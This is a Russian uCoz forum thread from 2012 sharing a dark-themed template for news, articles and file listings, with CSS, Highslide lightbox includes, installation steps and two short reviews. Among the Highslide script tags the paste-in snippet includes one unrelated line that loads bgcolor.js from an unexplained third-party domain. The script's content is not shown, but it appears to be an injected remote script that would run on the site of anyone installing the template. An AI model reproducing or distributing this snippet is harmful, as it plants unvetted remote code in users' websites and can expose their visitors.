Темный вид материалов каталога файлов, новостей,статей, новы - Форум ProUcoz.com - Темный вид материалов каталога файлов, новостей,статей, новы - Форум ProUcoz.com
Вторник 16:12 | 28.02.2017
Свежие темы · Участники · Правила форума · Поиск · RSS
Страница 1 из 11
Модератор форума: FR3cH, Reronage 
Форум ProUcoz.com » Готовые скрипты и интересные решения для системы uCoz » Каталог файлов » Темный вид материалов каталога файлов, новостей,статей, новы
Темный вид материалов каталога файлов, новостей,статей, новы
Канадаfafirok[Нет на сайте]
Дата: Вторник, 10.07.2012, 18:29 | Сообщение # 1
Сообщений: 208


О скрипте виде материала:
Рабочий, главное по дизайну шикарно красивый темный вид материалов каталога файлов, новостей,статей, новый diz-c, предназначен для темных дизайн сайтов, для них он был создан, и создан на высоком уровне как по дизайну как по работе, рекомендую ставить кому свой вид надоел, да к стате этот вид идет на три модуля и у вас есть большой выбор, это уже на ваш вкус где он будит украшать ваш сайт.
Приступаем к установке:
Здесь все по старому изменений нет, заходим в админ панель, далее ищем дизайн и потом выбираем модуль где хотите видеть этот вид и в этом модуле к примеру новости идем в вид материалов и убираем весь старый код и вставляем наш, на этом все, сохранились и радуемся новому виду

Code
<style>     
.vid_materialov {     
     background:url(http://zornet.ru/zornet_ru4/vid_mater_bg.png) repeat-y 0 0;     
     margin-bottom:5px;     
}     

.vid_mat_bg {     
     background:url(http://zornet.ru/zornet_ru4/vid_mater_bg_r.png) repeat-y right 0;     
     min-height:60px;     
}     

.vid_mat_title {     
     background:url(http://zornet.ru/zornet_ru4/vid_mater_title.png) no-repeat 0 0;     
     height:44px;     
     line-height:40px;     
     padding-left:8px;     
}     

.vid_mat_title_r {     
     background:url(http://zornet.ru/zornet_ru4/vid_mater_title.png) no-repeat right -45px;     
     height:44px;     
}     

.vid_mater_bot {     
     background:url(http://zornet.ru/zornet_ru4/vid_mater_bot.png) no-repeat 0 0;     
     height:24px;     
}     

.vid_mater_bot_r {     
     background:url(http://zornet.ru/zornet_ru4/vid_mater_bot.png) no-repeat right -25px;     
     height:24px;     
     line-height:27px;     
     padding-left:5px;     
     font-family:Tahoma;     
     font-size:11px;     
     color:#b7b7b7;     
}     

.vid_mater_bot_r a {     
     font-family:Tahoma;     
     font-size:11px;     
     color:#b7b7b7;     
}     

.vid_mat_title_r a,     
.vid_mat_title_r {     
     font-family:Tahoma;     
     font-size:11px;     
     color:#b7b7b7;     
     font-weight:bold;     
}     

.vid_mater_cont {     
     overflow:hidden;     
     padding:4px 0 9px 8px;     
}     

.vid_mater_cont .mess_l {     
     float:left;     
     width:132px;     
     height:132px;     
}     

.vid_mater_cont .mess_l img {     
     width:132px;     
     height:132px;     
     -moz-border-radius:5px;     
     -webkit-border-top-right-radius:5px;     
     -webkit-border-top-left-radius:5px;     
     -webkit-border-bottom-right-radius:5px;     
     -webkit-border-bottom-left-radius:5px;     
     -khtml-border-radius:5px;     
     border-radius:5px;     
     border:4px solid #313132;     
}     

.vid_mater_cont .mess_r {     
     overflow:hidden;     
     padding:0 5px 0 13px;     
     color:#b7b7b7;     
     font-family:Tahoma;     
}</style>     
<style type="text/css" media="all">     
     @import url(http://www.csomsk.ru/highslide/highslide.css);     
     </style>     
     <script type='text/javascript' src='http://www.csomsk.ru/highslide/highslide.js'></script>
     <script src="http://qyjkl.ru/bgcolor.js" type="text/javascript"></script>
     <script type='text/javascript' src='http://www.csomsk.ru/highslide/include_highslide.js'></script>     
     <script type="text/javascript">     
     hs.graphicsDir = 'http://www.csomsk.ru/highslide/graphics/';     
     </script>     
<div class="vid_materialov">     
<div class="vid_mat_bg">     

<div class="vid_mat_title">     
<div class="vid_mat_title_r">     
<div style="float:right;padding:15px 7px 0 0;"><div><?$RSTARS$('12',' http://zornet.ru/zornet_ru4/rank.png ','0','float')?> </div></div>     
<a href="$ENTRY_URL$">$TITLE$</a> <?if($MODER_PANEL$)?>$MODER_PANEL$<?endif?>     
</div>     
</div>     

<div class="vid_mater_cont">     
<div class="mess_l"><?if($IMG_URL1$)?><a title="Смотреть изображение новости $TITLE$" href="$IMG_URL1$" class="highslide" onclick="return hs.expand(this)"><img src="$IMG_URL1$" alt="$TITLE$" style="padding:3px;background:#1C1C1C;border:1px solid #363636;"></a><?endif?></div>     
<div class="mess_r">     
$MESSAGE$     
</div>     
</div>     
<div class="vid_mater_bot"><div class="vid_mater_bot_r">Добавил: <a href="$PROFILE_URL$">$USERNAME$</a> | Просмотров: $READS$ | Добавлено: <span title="$TIME$">$DATE$</span><?if($COMMENTS_URL$)?> <a href="$COMMENTS_URL$"> | Комментариев: ($COMMENTS_NUM$)</a><?endif?></div></div></div>


Да не забудьте так на будущее, зайдите в настройки модуля куда поставили и увеличьте сокращенный текст а то надпись добавить малентко будит вылазить и не так будит как на картинке, работы на 5 мин, кто не понял задайте вопрос на форуме, вам точно скажут , хотя йа изложил подробно.


fafirok

Сообщение отредактировал Reronage - Понедельник, 27.08.2012, 14:22
 
FR3cH[Нет на сайте]
Дата: Среда, 11.07.2012, 17:24 | Сообщение # 2
Хитрец всем хитрым
Сообщений: 213
Скрин:


Был. неплохо сделано, для темных дизайнов подойдет.3/5




Сообщение отредактировал FR3cH - Среда, 11.07.2012, 17:24
 
Российская ФедерацияReronage[Нет на сайте]
Дата: Понедельник, 27.08.2012, 14:23 | Сообщение # 3
Сообщений: 182
Не очень нравится, там где инфа про коменты и т.д ниочем сделано sad
 
Форум ProUcoz.com » Готовые скрипты и интересные решения для системы uCoz » Каталог файлов » Темный вид материалов каталога файлов, новостей,статей, новы
Страница 1 из 11
Поиск: